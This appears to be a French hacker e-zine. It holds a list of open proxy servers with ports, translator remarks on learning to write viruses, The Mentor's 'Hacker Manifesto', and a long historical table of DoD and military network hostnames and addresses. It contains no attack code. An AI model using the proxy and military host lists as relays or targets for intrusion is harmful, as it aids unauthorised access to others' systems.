GOPH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Siemens ramses.erlm.siemens.de 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U-Rb. rrznw6.rz.uni-regensburg.de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DU  Berkeley smorgasbord.ICSI.Berkeley.EDU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DU  PurdueNC Brahma.CC.PurdueNC.Edu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I  Inet proxy.inet.fi 80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I  TPU proxy.cs.tpu.fi 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R  AC ppar.ac-bordeaux.fr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GOV  Dgs wall-14.dgs.ca.gov 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T  TO www.focos.to.it 3128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T  Lcnet mail.lcnet.it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JP  K-K lip.kobe-kosen.ac.jp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JP  Fukuoka kusu.city.kurume.fukuoka.jp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KR  Kyunghee cvs2.kyunghee.ac.kr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KR  Taegu biho.taegu.ac.kr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IL  Dla cani.dla.mil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IL  OSD pgwcm.otd.osd.mil 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IL  Navy gatekeeper.jag.navy.mil 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IL  USMC gate1.yuma.usmc.mil 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ET  Deltacom cacheflow1.deltacom.net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ET  Coqui proxy.coqui.net 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L  Nhtv proxy.nhtv.nl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L  Tebenet www.tebenet.nl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RG  Londonderry www.londonderry.org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RG  Aclin aclin.org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H  EMC ascaris.emc.com.ph 8888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H  Info mail2.info.com.ph 3128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T  Isec leonardo.isec.pt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T  Teleweb caclis01.teleweb.pt 3128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Y  Infonet ns1.infonet.com.py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A  Qatarnet proxy.qatar.net.qa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  Varnamo ns.varnamo.se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R  Turnet proxy1.turnet.net.tr 8080  HT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R  Turnet proxy2.turnet.net.tr 8080  HT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W  IS c1.h202052106.is.net.tw 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W  Golden club.golden.com.tw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K  Ondemand cache1.ondemand.co.uk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K  LUT double-panic.lut.ac.uk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S  K12 stpauls.pvt.k12.al.us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S  Oh websense.gcpl.lib.oh.us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ZA  New cache.new.co.za 8080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ZA  Global cache02.global.co.za 3128  HTTP/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ZW  Cybergate proxy.cybergate.co.zw 8080  HTTP/FTP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ZW  Africaonline proxy.africaonline.co.zw 8080  HTTP/FTP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Quelques textes traduits par Clad Strif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mme chaque chose, un texte reste difficile à traduire si on essaye de faire du mot à mot. Disons que je vais reprendre les idées générales en modifiant certain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onnées si nécessaire. Il est évident que je ne vais pas m'éterniser sur ces articles. Je n'en mets que 2 ou 3, notamment de la culture underground, ça risque de ne p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apprendre grand chose si vous êtes plus aspect technique que culture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 la question: "La culture Underground existe-t-elle vraiment, et est-elle en mesure de se développer?", je réponds oui... Mais pour avoir cette culture, il faut a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pris cette culture: il ne s'agit pas d'avoir une éthique morale, d'avoir des principes etc... Il faut croire en e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ù peut on avoir plus d'informations sur les virus, par Theor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s livres sur la programmation en assembleur sont chiants mais utiles quand on veut faire des virus. Le plus intéressant reste la controverse qui est autour d'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aciles à faire, gartuits, parfois légaux (certains cas spéciaux), et on peut trouver des informations sur les virus aussi facilement que si vous vouliez en avoir un. Il y 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eaucoup de newsgroups qui existent traitant du sujet (alt.virus comme types de newsgroups). Mais le niveau d'expertise de ces newsgroups est minima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ureusement qu'il y a beaucoup d'experts en virus. Pour en devenir un faites vous appeler comme tel, et comprenez la programmation, les systèmes d'exploita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ment marche les virus etc... Il existe beaucoup d'informations concernant des virus, trouvable partout sur le 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as particulier: la conscience d'un hacker par The Mentor EN ANGLAIS (non traduit: texte original), après son arrest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entor's Last Word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nother one got caught today, it's all over the papers.  "Teenag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rrested in Computer Crime Scandal", "Hacker Arrested after Ban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ampering"... Damn kids.  They're all alike. But did you, in your thre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iece psychology and 1950's technobrain, ever take a look behind th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yes of the hacker?  Did you ever wonder what made him tick, what forc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haped him, what may have molded him? I am a hacker, enter my worl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ine is a world that begins with school... I'm smarter than most of th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ther kids, this crap they teach us bores me...  Damn underachiev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hey're all alike. I'm in junior high or high school.  I've listened to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eachers explain for the fifteenth time how to reduce a frac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 understand it.  "No, Ms. Smith, I didn't show my work.  I did it i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y head..." Damn kid.  Probably copied it.  They're all alik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 made a discovery today.  I found a computer.  Wait a second, this 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ol.  It does what I want it to.  If it makes a mistake, it's because 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crewed it up.  Not because it doesn't like me...  Or feels threatened by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e.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't b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ere... Damn kid.  All he does is play games.  They're all alike. And th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t happened... a door opened to a world... rushing through the phone li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ike heroin through an addict's veins, an electronic pulse is sent o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 refuge from the day-to-day incompetencies is sought... a board is foun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his is it... this is where I belong..." I know everyone here... ev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f I've never met them, never talked to them, may never hear from the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gain... I know you all... Damn kid.  Tying up the phone line agai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hey're all alike... You bet your ass we're all alike... we've be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poon-fed baby food at school when we hungered for steak... the bits of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eat that you did let slip through were pre-chewed and tasteles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We've been dominated by sadists, or ignored by the apathetic.  The few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hat had something to teach found us willing pupils, but those few a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ike drops of water in the deser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his is our world now... the world of the electron and the switch, th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eauty of the baud.  We make use of a service already existing witho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ying for what could be dirt-cheap if it wasn't run by profiteerin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gluttons, and you call us criminals.  We explore... and you call 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riminals.  We seek after knowledge... and you call us criminals.  W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xist without skin color, without nationality, without religious bia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nd you call us criminals. You build atomic bombs, you wage wars, yo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urder, cheat, and lie to us and try to make us believe it's for o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wn good, yet we're the criminal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Yes, I am a criminal.  My crime is that of curiosity.  My crime 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hat of judging people by what they say and think, not what they look lik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y crime is that of outsmarting you, something that you will nev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orgive me for. I am a hacker, and this is my manifesto.  You may sto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his individual,but you can't stop us all... after all, we're all alik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he Mento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ay the members of the phreak community never forget his words -J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traduction est celle de NeurAlien. Mais je ne la mets pas: ils est plus inétressant de se baser sur son texte et de le traduire avec son expérience et son vécu, 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comprendre ce que neurAlien a traduit avec son expérienc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oD Internet Host Tab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eci est là liste là plus complète jusqu'ici des sites militaires internet Do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nter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ode addres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6.1.0.1         yuma-emh1.army.mil yuma.arpa yuma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7.8.0.2         protolaba.dca.mil protolab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7.0.0.3         edn-vax.dca.mil edn-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0.0.2         ccs.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1.0.2         cci.bbn.com bbncci.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3.0.2         ccd.bbn.com bbncc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5.0.2         cck.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0.0.5         cd2.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2.0.5         cc1-tac.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3.0.9         bbnnet2-arpanet-gw.arpa bbnnet2-arpanet-gw.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7.0.9         egonoc.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0.0.10        cc4-tac.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3.0.10        jsnach.bbn.com jsnac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1.0.12        noc3.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5.0.14        dev.cs.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89.0.94     dev.cs.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1.0.16        rvax.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89.0.132    rvax.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1.0.18        cc2.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7.0.18        cca.bbn.com bbncc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6.0.19        cc3-tac.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9.0.19        ccny.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2.0.24        ccu.bbn.com bbnccu.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3.0.24        cco.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0.0.26        ccp.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1.0.26        ccq.bbn.com bbnccq.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3.0.26        hnoc.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5.0.26        z.bbn.com bbnz.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7.0.26        ccx.bbn.com bbncc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8.0.26        ccy.bbn.com bbncc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16.0.33       cce.bbn.com bbncc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1.0.35        col.bbn.com bbncc-columbi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2.0.37        cc-vm.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0.0.58        idnoc.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8.0.0.97        noc4.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4.0.5        gw-1.cs.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31.103.1    gw-1.cs.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5.58.1      gw-1.cs.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7.0.5        lpr-netman.arpa lpr-netman.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2.0.7        rand-arpa-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2.0.11       su-arpa-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3.1.11       stanfor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5.0.14       white.incsys.com incrementa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31.230.1    white.incsys.com incrementa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6.0.14       cadre.dsl.pitt.edu cadre.arpa cadre.dsl.pittsburgh.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147.128.1   cadre.dsl.pitt.edu cadre.arpa cadre.dsl.pittsburgh.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147.1.1     cadre.dsl.pitt.edu cadre.arpa cadre.dsl.pittsburgh.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30.49.128.1    cadre.dsl.pitt.edu cadre.arpa cadre.dsl.pittsburgh.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8.0.14       gateway.sei.cmu.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237.254.254 gateway.sei.cmu.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2.237.251   gateway.sei.cmu.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4.0.17       tis.com ti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2.0.20       dcec-arpa-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3.0.20       edn-unix.dca.mil edn-uni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5.0.20       dcec-psa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1.0.20      sccgate.scc.com sccgat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21.27      mcon.isi.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0.21.22      mcon.isi.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22.27      speech11.isi.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23.27      wbc11.isi.edu isi-wbc1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0.23.22      wbc11.isi.edu isi-wbc1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89.27      setting.isi.edu isi-setting.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91.27      pallas-athene.isi.edu isi-pallas-athen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97.27      aikane.isi.edu isi-aikan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98.27      czar.isi.edu isi-cza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99.27      mycroft.isi.edu isi-mycroftxx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124.27     cmr.isi.edu isi-cm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156.27     png11.isi.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254.27     echo.isi.edu isi-ech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0.0.28       arpa3-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0.31       amc.xait.xerox.com cca-vm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4.0.31       xait-arp-tac.arpa cca-arp-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0.0.46       collins-p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0.46       collins-gw.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12.172.11   collins-gw.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7.0.51       a-lhi-sri-0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3.1.54       jpl-robotic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0.63       bbn-arpa-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2.0.77       mit-arpa-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3.0.77       umass-gw.cs.umass.edu unix1.cs.umass.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119.40.12   umass-gw.cs.umass.edu unix1.cs.umass.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0.0.82       tac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0.82       a-lhi-bbn-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5.0.82       arpa-mc.arpa arpanet-m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5.0.96       prc-gw.prc.unisys.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2.0.99       vax-x25.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3.0.99       bbn-x25-test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4.0.99       bbn-x25-test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5.0.99       test-host5-x25.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0.0.115      anoc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0.0.126      tycho.ncsc.mil tych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0.126      afterlife.ncsc.mil afterlif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3.2.16.8       parcvax.xerox.com vaxc.xerox.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3.1.100.206    arisia.xerox.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3.0.12.232     xerox.com xero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4.0.0.4        vtest.cs.ucl.ac.uk ucl-vtes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4.0.0.5        ess-tun.cs.ucl.ac.u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4.0.0.9        tunnel.cs.ucl.ac.u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5.255.152.2    sde.hp.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5.255.16.7     hplabs.hp.com hplab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6.1.0.1        decwrl.dec.com wrl.dec.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6.10.0.1       vixie.sf.ca.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6.1.0.2        gatekeeper.dec.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6.1.0.3        cerberus.pa.dec.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6.1.0.8        src.dec.com decsrc.dec.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6.1.0.9        wsl.dec.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2.2.1       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7.0.2       mitln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5.0.2       media-lab.media.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       euler.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92.0.2       coventry.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2.0.3       bitsy.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9.0.3       lid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5.0.3       atrp.media.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       cauchy.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92.0.3       mitvma.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1.0.4       orpheu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6.0.4       xv.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4       abel.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9.0.5       lmpvax.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6.0.5       dolphin.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5       stoke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10.0.6       sludge.lcs.mit.edu mit-sludg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134     sludge.lcs.mit.edu mit-sludg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127.25.101  sludge.lcs.mit.edu mit-sludg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62.0.6       eddie.mit.edu mit-eddie.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2.0.6       priam.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5.0.6       ems.media.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6.0.6       sloan.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6       banach.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1.0.7       jason.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7       fermat.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2.0.8       achille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8       bourbaki.mit.edu math.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10.0.9       gross.ai.mit.edu mit-gro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52.22.9     gross.ai.mit.edu mit-gro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52.14.1     gross.ai.mit.edu mit-gro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52.32.1     gross.ai.mit.edu mit-gro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9       archimede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5.0.10      space.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10      fourier.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11      newton.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1.0.12      pari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12      noether.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0.0.13      charon.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13      zermelo.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2.1.14      eagle.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0.0.14      prometheu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14      borel.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15      poisson.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16      schubert.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62.0.17      dspvax.mit.edu mit-bugs-bunn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0.0.17      bloom-beacon.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17      boole.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7.0.18      fft.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18      galoi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7.0.19      dft.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19      laplace.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7.0.20      porky.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0      ramanujan.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92.0.20      po.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7.0.21      sam.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1      turing.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2      russell.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3      hypatia.mit.edu emma.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4      laurent.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5      bessel.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6      cantor.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7      fibonacci.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8      lebesgue.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29      pythagora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5.0.30      hq.media.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0      von-neumann.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1      polya.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2      pascal.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3      euclid.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4      bernoulli.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30.0.35      cls.lcs.mit.edu mit-cl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5      hausdorff.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36      xx.lcs.mit.edu lcs.mit.edu mit-x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6      dedekind.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7      jacobi.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1.0.38      prep.ai.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8      hermite.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2.0.39      athena.mit.edu mit-athen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39      tarski.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40      markov.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7.0.41      godel.mit.edu goedel.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8.0.55      cogito.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7.0.56      goldilocks.lcs.mit.edu mit-goldilock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10.0.71      pm-prj.lcs.mit.edu mit-prj.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80      melange.lcs.mit.edu grape-nehi.lc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8.0.80      hstbme.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8.0.82      infood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8.0.85      psyche.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52.0.92      theory.lcs.mit.edu mit-theor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8.0.92      erl.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94      thyme.lcs.mit.edu jhereg.lcs.mit.edu toadkiller-dog.lc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95      larch.lcs.mit.edu mit-larc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98      rinso.lcs.mit.edu mit-rins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106     tide.lcs.mit.edu mit-tide.arpa mit-tide tid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107     dash.lcs.mit.edu mit-dash.arpa mit-dash das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114     hq.lc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2.0.114     mgm.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115     allspice.lcs.mit.edu ptt.lc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121     lithium.lc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2.0.122     ra.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2.0.142     arktouro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1.0.151     mit-strawb.arpa strawb.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0.0.160     w20n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26.0.176     zurich.ai.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0.0.181     osborn.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0.0.191     delphi.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30.0.192     vx.lcs.mit.edu mit-vax.arpa mit-vx.arpa mit-vax.lc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10.0.195     big-blue.lcs.mit.edu mit-big-blu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48.0.195     live-oak.lcs.mit.edu oak.lc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72.0.205     garp.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30.0.206     zermatt.lc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30.0.212     expo.lc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48.0.216     wild-blue-yonder.lcs.mit.edu wild-blue.lcs.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86.0.216     diamond.mit.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8.62.0.232     caf.mit.edu mit-caf.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1        oberursel.mt.ddn.mil oberursel-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1        rhe-eds.af.mil rhe-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1        obl-ignet.army.mil obe-igne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1        pcc-obersl.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1        oberursel-emh1.army.mil email-oberursl.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2        emmc.dca.mil eur-milnet-m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2        patch.mt.ddn.mil minet-vhn-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2        eur.dca.mil dca-eur.arpa dca-eur.dca.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2        moehringen-emh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2        moehringen-ignet.army.mil igmirs-moehringe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2        patch.dca.mil patc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2        goeppingen-emh1.army.mil email-goeppngn.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2        nellingen-emh1.army.mil email-nellingn.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2       pcc-moeh.arpa moeh-pcc.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2       pcc-nell.arpa nel-pcc.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2       pcc-boeb.arpa bbl-pcc.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2       pcc-vaih.arpa vhn-pcc.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2       patch2.mt.ddn.mil vaihingen2-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2       frg.bbn.com bbncc-eu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2       erf-boe.arpa bbl-erf.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3        sandiego.mt.ddn.mil sandiego-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3        trout.nosc.mil nosc.mil trout.nosc.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49.16.7     trout.nosc.mil nosc.mil trout.nosc.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3        logico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3        nprdc.navy.mil nprdc.arpa nprdc.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5.65.1      nprdc.navy.mil nprdc.arpa nprdc.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3        mcdn-cp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3        sdcsvax.ucsd.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54.20.1     sdcsvax.ucsd.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3        navele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3        navelexnet-s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3        sds-sandgoa.arpa sds-sandgoa.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3        mirna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3       navmeducapendleto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3       sss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3       navmeducasandieg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3       sandiego-htt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3       scubed.com scubed.arpa scubed.scubed.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31.63.10    scubed.com scubed.arpa scubed.scubed.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16.16.70    scubed.com scubed.arpa scubed.scubed.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3       grunion.nosc.mil nosc-ether.arpagrunion.nosc.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42.2.2      grunion.nosc.mil nosc-ether.arpagrunion.nosc.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3       comnavsurfp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4        zwe-eds.af.mil zwe-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4        campbell-bks.mt.ddn.mil campbllbks-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4        heidelberg-emh1.army.mil heidelberg-em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4        heidelberg-perddims.army.mil perddims-hei.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4        edas-scw.arpa szn-edasscw.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4        cpo-man-eur.arpa mhn-cpo.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4        hdg-ignet1.army.mil hhsp-igne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4        hdg-ignet2.army.mil hei2-igne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4        jacs6333.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4       pcc1.arpa hdg-pcc.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4       ccpd.arpa hdg-ccpd.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4       cpo-hdl-eur.arpa hdg-cpo.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5        karl-shurz.mt.ddn.mil bremerhaven-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5        pals-68.arpa brn-pals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5        pals-67.arpa brn-pal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5        oldendorf-am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5        bremrhvn-mepr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5        bremerhave-emh1.army.mil email-klshzksn.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5       bremerhave-asims.army.mil brm-asim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5       dasps-e-562-b.arpa obl-daspseb.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5       gst-ignet.army.mil gar-igne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5       mtmc-aif-b.arpa brn-aifb.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6        rotterdam.mt.ddn.mil minet-rdm-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6        sostrbrg-piv.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6        cna-eds.af.mil cna-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6        schinnen-emh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6        rotterdam-emh1.army.mil email-rotterdm.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6       mtmc-aif.arpa rotterdam-aif.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6       dasps-e-778.arpa rotterdam-daspse.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6       mtf-sosbg.af.mil mtf-sosbg.arpa mtf-cp-newamsterda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7        london.mt.ddn.mil minet-lon-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7        ben-eds.af.mil ben-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7        chievres-emh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7       alc-eds.af.mil alc-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7       kem-eds.af.mil kem-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7       london-ncp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8        washdc-nrl.mt.ddn.mil nrlwashdc-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8        ccf.nrl.navy.mil ccf3.nrl.navy.mil nrl.arpa nrl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60.0.3      ccf.nrl.navy.mil ccf3.nrl.navy.mil nrl.arpa nrl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8        nardacwash-0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8        spawar-00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8        sds-cda1.arpa sds-cda1.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8        navelexnet-war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8       ships-donoac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8       wnyosi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2.8       wnysami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3.8       wnyosi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4.8       wnyosi7.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8       amdahl-5850-vm.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8       amdahl-v7a.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8       amdahl-v7.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8       ibm4381.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0.8       nfe.nrl.navy.mil nrl-nf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60.1.1      nfe.nrl.navy.mil nrl-nf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26.26.1     nfe.nrl.navy.mil nrl-nf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1.0.8       arctan.nrl.navy.mil nrl-arcta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9        sigonella.mt.ddn.mil sigonella-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9        com-eds.af.mil com-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9        san-eds.af.mil san-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9        sig-ncp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9        mtf-comiso.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9        comiso-am1.af.mil comiso-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9       comiso-piv.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10       rota.mt.ddn.mil rota-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10       mtf-rota.arpa mtf-rota.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10       rota-ncp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11       corona.mt.ddn.mil corona-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11       fltac-po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11       santaana-dmins.dla.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11       c.navy.mil dgo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11       fltac-sperr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11       norton-ro1.af.mil norton-ro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11      afsc-bsd.af.mil afsc-bmo.af.mil afsc-bm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11      norton-piv-2.af.mil norton-piv-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11      afisc-01.af.mil afisc-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11      corona-p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31.174.2    corona-p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12       vicenza.mt.ddn.mil vicenza-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12       vca-asims.arpa vic-asim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12       cpo-vic-eur.arpa vic-cpo.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12       afrts-vic.arpa vic-afrt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12       vic-ignet.army.mil vic-igne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12       emed-vicenza.arpa vic-emed.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12       meprs-vicenza.arpa vic-mepr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12      jacs6335.arpa vic-hac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12      pcc-vice.arpa vic-pcc.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12      vicenza-emh1.army.mil email-vicenza.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13       gunter.mt.ddn.mil gunter-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13       gunter-adam.af.mil gunter-ada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13       gunterp4.af.mil gunterp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31.2.16.1      gunterp4.af.mil gunterp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13       rucker-perddims.army.mil perddims06.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13       bcgunt.af.mil bcgun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13      jackson-perddims.army.mil perddims07.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13      hrc-iris.af.mil hrc-iri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9.141.11.1    hrc-iris.af.mil hrc-iri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13      mtf-gunter.af.mil mtf-gunte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13      gu-eds.af.mil gu-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13      camnet-maxwell-r01.af.mil camnet-maxwell-r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13      maxwell-am1.af.mil maxwell-am1.arpa camnet-maxw-r0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14       zweibrucke-asims.army.mil asims-zweibrucke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14       dmaoe.dma.mil dmaodsdo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14      cpo-prm-eur.arpa pms-cpo.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14      cpo-zwi-eur.arpa zbn-cpo.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15       ramstein.mt.ddn.mil ramstein-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15       van-eds.af.mil van-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15       camnettwo-ramstein.af.mil camnettwo-ramstei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15       camnet-ramstein.af.mil camnet-ramstei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15      erf-nah.arpa zbn-erfnah.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16       moffett.mt.ddn.mil moffett-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16       arc-psn.arc.nasa.gov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16       amelia.nas.nasa.gov ames-nas.arpa ames-nas.nas.nasa.gov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9.99.20.1     amelia.nas.nasa.gov ames-nas.arpa ames-nas.nas.nasa.gov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16       nas-psn.nas.nasa.gov ames-nasb.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1.0.8        nas-psn.nas.nasa.gov ames-nasb.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102.32.5    nas-psn.nas.nasa.gov ames-nasb.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16       mofnaf.navy.mil mofnaf.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128     mofnaf.navy.mil mofnaf.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16       sac-misc6.af.mil sac-misc6.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16       gtewd.af.mil gtew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17       mclean2.mt.ddn.mil mclean2-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17       mclean.mt.ddn.mil mitre-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17       mitre.arpa mwunix.mitre.or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29.104.0    mitre.arpa mwunix.mitre.or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17       his-fsd6.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17       his-fsd8.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17      ncpds-arlingto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17      ddn-wms.arpa ddn-wms.dca.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17      fstc-chvill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17      mclean-unisy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17      cnr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17      sysr-7cg.af.mil sysr-7cg.arpa sysr-7cg-dd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17      dulles-ignet.army.mil ignet-pr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17      osi-2-gw.dca.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17      osi-2-gw.dca.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9.0.17      beast.ddn.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33.3.2      beast.ddn.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18       multics.radc.af.mil radc-multic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18       drum-perddims.army.mil perddims27.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18       griffiss.mt.ddn.mil radc-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18       lonex.radc.af.mil radc-lone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18       lons.radc.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18       coins.cs.umass.edu cs-umass.ed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18      softvax.radc.af.mil radc-soft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18      sutcase.af.mil sutcas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18      ftdrum-mepr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18      griffiss-piv-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18      electra.cs.buffalo.edu buffalo-c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205.34.9    electra.cs.buffalo.edu buffalo-c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18      cs.rit.edu ri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18      mtf-plattsburgh.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7.0.18      ftdrum-ignet.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8.0.18      drum-tcacci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19       eagle.nist.gov nbs-vms.arpa nist.nbs.gov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20       oo1.af.mil oo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20       hillmdss.af.mil hillmd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20       hill.mt.ddn.mil hill1-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20       hill-piv-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20       remis-oo.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20       edcars-oo.af.mil edcars-o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20       dsacs10.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20      oodis01.af.mil oodis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12.100.3    oodis01.af.mil oodis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20      aflc-oo-aisg1.af.mil aflc-oo-aisg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20      mt-home-piv-1.af.mil mt-home-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20      mednet-oo.af.mil mednet-o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20      ogden-dmins.dla.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9.0.20      snag-oo.af.mil snag-o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21       sm-eds.af.mil sm-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21       oaknsc.navy.mil oakns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148      oaknsc.navy.mil oakns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21       oms-nws.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22       mcclellan.mt.ddn.mil mcclellan-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22       mcclelln-am1.af.mil mcclelln-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22       c3po.af.mil sm-alc-c3p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31.105.1.1     c3po.af.mil sm-alc-c3p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22       aflc-sm-dmmis1-si01.af.mil aflc-sm-dmmis1-si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22       smdis01.af.mil rdb-s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22       edcars-mcclellan.af.mil edcars-mcclella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22      travis-piv-2.af.mil travis-piv-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22      lewis-perddims.army.mil perddims20.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22      beale-piv-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22      snag-sm.af.mil snag-s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23       mcclellan2.mt.ddn.mil mcclellan2-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23       sm1.af.mil s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23       mcclellan-mdss.af.mil mcclellan-md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23       aflc-sm-aisg1.af.mil aflc-sm-aisg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23       netpmsa-bangor1.dca.mil netpmsa-bangor1.arpa terpss-ttf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23      remis-sm.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23      mednet-sm.af.mil mednet-s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24       nad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24       dcrp.dla.mil dcrp.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24      dcrp.dla.mil dcrp.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24       johnsville.mt.ddn.mil johnsville-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24       ncpds-phili1.navy.mil ncpds-phili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24       ncpds-phili2.navy.mil ncpds-phili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24       dmadp.dma.mil dmaodsdcp.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24       dis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24       dpsc.dla.mil dps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24      navmeducaphi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24      pera-crudes.navy.mil pera-crude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24      burroughs-dev-2.dca.mil burroughs-dev-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24      burroughs-dev-1.dca.mil burroughs-de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9.0.24      philashpyd-poe.navy.mil philashpyd-po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24      ccsu.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25       mil-eds.af.mil mil-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25       croughton.mt.ddn.mil croughton-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25       gre-eds.af.mil gre-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25       blnhmcsc-am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25       alconbry-piv-2.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25       mtf-upperheyford.af.mil mtf-upperheyfor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25      upp-eds.af.mil upp-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25      fairford-am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25      mtf-ltlrsgtn.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25      mtf-fairford.af.mil mtf-fairfor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25      mtf-grnhmcmn.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26       pentagon.mt.ddn.mil pentagon-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26       pentagon-ignet.army.mil igmirs-daig.army.mil igmirs-daig.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26       haflee.af.mil hafle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26       pentagon-opti.army.mil optimis-pent.arpa pentagon-emh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26       pent-gw-hq.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10.26      aad-hq.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27.26      hq.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70.26      vm7cg.af.mil vm7cg.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26       msddnpent.af.mil msddnpen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26       coan.af.mil coa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26       fms2.af.mil fms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26      navelexnet-crysta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26      nardac-nohim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26      opsnet-pentagon.af.mil opsnet-pentago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27       holy-loch.mt.ddn.mil minet-hlh-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27       oslo-am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27       menwithhill-am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27       dmris-keflavik.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28       elmendorf.mt.ddn.mil elmendorf-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28       ftrichardson-ignet.army.mil ignet-172d-infbd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28       richardson-perddims.army.mil perddims4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28       elmendrf-am1.af.mil elmendrf-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28      elmendorf-piv-2.af.mil elmendorf-piv-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28      richards-tcacci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28      decco-ak.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28      altos1.af.mil altos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29       aberdeen.mt.ddn.mil brl-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29       apg-emh1.apg.army.mil apg-1.apg.army.mil apg-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29       brl.arpa brl.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29       dis.dla.mil di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29       apg-emh2.army.mil apg-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29       csta-1.apg.army.mil csta-on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29       apg-perddims.army.mil perddims38.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29      aberdeen-ignet2.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0.29      apg-emh3.apg.army.mil apg-3.apg.army.mil apg-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1.0.29      apg-emh4.apg.army.mil apg-4.apg.army.mil apg-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2.0.29      apg-emh7.army.mil ilcn-apg.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30       brooks.mt.ddn.mil brooks-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30       afmpc-2.af.mil afmpc-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30       sam-housto-mil80.army.mil mil-80-5bd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30      tisg-6.af.mil tisg-6.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30      hqhsd.brooks.af.mil bafb-ddn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30      ed-san-ant.af.mil ed-san-an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31       sds-norflka.arpa sds-norflka.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31       monroe-tds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31       netpmsa-norfolk1.dca.mil netpmsa-norfolk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31       nardacv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31       pera-as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31      idanf.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31      spawar08.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31      seacenlant-portsmth.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31      nohimsmidlan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31      qedvb.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31      navmeducacd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31      cinclant-norfolk.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31      ftmonroe-ignet2.army.mil monroe-ignet2.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31      norndc.navy.mil nornd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5.0.31      comnavairlant.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6.0.31      sub-force.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7.0.31      subship-portsmouth.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32       greeley.mt.ddn.mil greely-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32       ftgreely-adac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33       monterey.mt.ddn.mil nps-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33       monterey-perddims.army.mil perddims36.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33       cs.nps.navy.mil nps-c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31.120.1.10    cs.nps.navy.mil nps-c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33       monterey-asbn.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0.33      cc.nps.navy.mil np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34       lbl-gw.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34       san-franci-mil80.army.mil mil-80-6bd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34       mare-island-shipyd.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34      vallejo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34      netpmsa-vallej01.arpa terpss-vallej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34      netpmsa-vallejo2.arpa terpss-vallejo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34      netpmsa-vallejo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35       sandiego2.mt.ddn.mil san-diego-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35       nosc-tecr.arpa tecr.arpa tecr.nosc.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35       nosc-secure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35       nosc-secure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35       ntsc-pac.arpa vaxp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35       nardac-sandieg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35       netpmsa-sandiego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35       netpmsa-sandiego2.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35      moccw.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35      sndnd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35      sndnd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35      corona-pad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35      nuwes-sd.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35      bendix-s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35      seacenpac-sandiego.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36       hawaii-emh.pacom.mil hawaii-em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36       smith.mt.ddn.mil hawaii2-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36       nstcpvax.arpa ieln-ntecp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36       honolulu.army.mil perddims45.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36      netpmsa-pearl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37       atlanta-asims.army.mil asims-rdca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37       mcpherson.mt.ddn.mil mcpherson-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37       ftgillem-darms2.army.mil gillem-darm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37       mcpherson-darms2.army.mil darms-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37       mcpherson-darms1.army.mil darms-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37       gordon-perddims.army.mil perddims3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37       columbia-aim1.af.mil columbia-ai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37      soraaa.army.mil soraa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37      gordon-jacs6360.army.mil gordon-jac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37      shaw-piv-1.af.mil shaw-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38       great-lakes.mt.ddn.mil greatlakes-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38       dlsc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115     dlsc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38       drms.arpa comten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115      drms.arpa comten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38       dlsc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115      dlsc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38       netpmsa-gtlakes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38      netpmsa-gtlakes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38      netpmsa-gtlakes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38      kisawyer-am1.af.mil kisawyer-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38      sheridan-asims2.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38      kisawyer-piv-1.af.mil kisawyer-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38      navmeducaglake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9.0.38      sds-glakesa.arpa sds-glakesa.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39       edwards.mt.ddn.mil edwards-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39       edwards-2060.af.mil edwards-2060.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39       edwards-vax.af.mil edwards-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39       mtf-edwards.af.mil mtf-edwar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39       george-piv-1.af.mil george-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39       norton-piv-1.af.mil norton-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39       edwards-piv-1.af.mil edwards-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39      edwards-am1.af.mil edwards-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39      edwards-argus.af.mil edwards-argu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39      asims-047.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39      edwards-saftd-2.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40       cambridge.mt.ddn.mil bbn-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40       ccz.bbn.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40       supship-boston.navy.mil supship-bosto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40       plattsburgh-piv-1.af.mil plattsburgh-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40       gw1.hanscom.af.mil esdvax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9.53.0.101    gw1.hanscom.af.mil esdvax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40      navmedcl-portsmout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40      westover-piv-1.af.mil westover-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40      pease-piv-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40      ftdevens-mepr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40      boston-dmins.dla.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9.0.40      nocws.dca.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41       redstone.mt.ddn.mil redstone-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41       redstone-emh3.army.mil micom-tes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41       redstone-emh4.army.mil usarec-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41       milneth.ornl.gov ornl-ms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41       campbell-perddims.army.mil perddims1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41       bdmsc-hun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41       redstone-perddims.army.mil perddims30.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41       netpmsa-milln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41       ncpds-oakridge9.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41       redstone-at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41      ncpds-oakridge8.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41      mtf-montgomery.af.mil mtf-montgomer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79       mtf-montgomery.af.mil mtf-montgomer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41      idamf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41      columbus-aim1.af.mil columbus-ai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41      aedc-vax.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41      dsr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41      camnet-arnold-r01.af.mil camnet-arnold-r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41      redstone-mepr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41      redstone-ignet.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5.0.41      redstone-emh2.army.mil mico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209     redstone-emh2.army.mil mico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6.0.41      redstone-emh1.army.mil mic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209      redstone-emh1.army.mil mic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42       ramstein2.mt.ddn.mil ramstein2-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42       ramstein2-emh.af.mil ramstein2-emh.arpa ram-em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42       ram-esims.af.mil ram-esim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42       ramstein-piv-1.af.mil ramstein-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42       lrc-eds.af.mil lrc-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42      ram-eds.af.mil ram-e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42      baumholder-emh1.army.mil email-baumholdr.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42      mtf-ramstein.arpa mtf-ramstein.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42      mtf-hq.af.mil mtf-hq.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42      ald-gdss.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15      ald-gdss.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43       shafter.mt.ddn.mil shaftr-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43       shafter-asims.army.mil asims-045.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43       pod-har.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43       pepo4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43       deers-asmo.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43       hawaii-emh1.pacom.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43       ftshafter-ignet2.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43      pod-hon.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100      pod-hon.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43      ftshaftr-jacs6358.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43      tamc-mepr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43      pep042.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44       navmeducaorland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44       ntsc-at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44       orlando.mt.ddn.mil orlando-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44       orlando-htt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44       sperry-system-11.dca.mil sperry-system-11.arpa sperry1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44       ftlauderdale.nswc.navy.mil nswc-f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44      sds-orlanda.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44      netpmsa-orlan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44      netpmsa-orlan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44      ntsc-74.navy.mil ntsc-7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44      ntsc-sef.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44      orlando-emh1.army.mil pmtrad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45       dovernj.mt.ddn.mil ardec-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45       pica.army.mil arde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45       bayonne-tcaccis.army.mil tcaccis-ba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45       dover-emh1.army.mil pica-qa.arpa qa.pica.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45       dcrn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58      dcrn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45      pltsbrgh-am1.af.mil pltsbrgh-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45      drum-asims.army.mil asims-006.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45      gw.pica.army.mil pic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12.8.4      gw.pica.army.mil pic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9.139.1.4     gw.pica.army.mil pic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0.45      dover-emh2.army.mil pica-lca.arpa lca.pica.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46       port-hueneme.mt.ddn.mil porthueneme-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46       ptmpm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46       dsacs08.army.mil dsacs08.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46       navmeducahuenem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46      vaxb.navy.mil nswses.arpa vaxb.nswses.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31.106.3    vaxb.navy.mil nswses.arpa vaxb.nswses.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47       wrightpat.mt.ddn.mil wpafb-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47       wpafb-afwa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47       wpafb-jalcf.arpa wpafb-jalcf.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47       dsac-g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47       wpafb-afwp1.af.mil wpafb-afwp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47       